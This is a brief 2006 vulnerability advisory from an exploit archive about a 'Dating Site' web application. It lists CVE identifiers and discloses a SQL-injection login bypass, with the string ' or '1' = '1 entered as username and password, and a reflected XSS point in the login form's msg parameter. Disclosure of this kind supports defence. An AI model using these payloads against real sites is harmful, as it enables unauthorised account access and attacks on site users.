Bug: Dating Site [ login bypass & xss] (WLB-2006110101 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Dating Site [ login bypass & xss]
 Credit: laurent gaffié & benjamin mossé
 Date: 2006.11.25
 CWE: N/A
 CVE: CVE-2006-6022 (Show details)
CVE-2006-6021 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

vendor site:http://www.hotwebapp.com/
product:Dating Site
bug:injection sql & xss
risk:high

log in with :
username = ' or '1' = '1
passwd = ' or '1' = '1

xss get :
/login_form.asp?msg=[xss here]

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com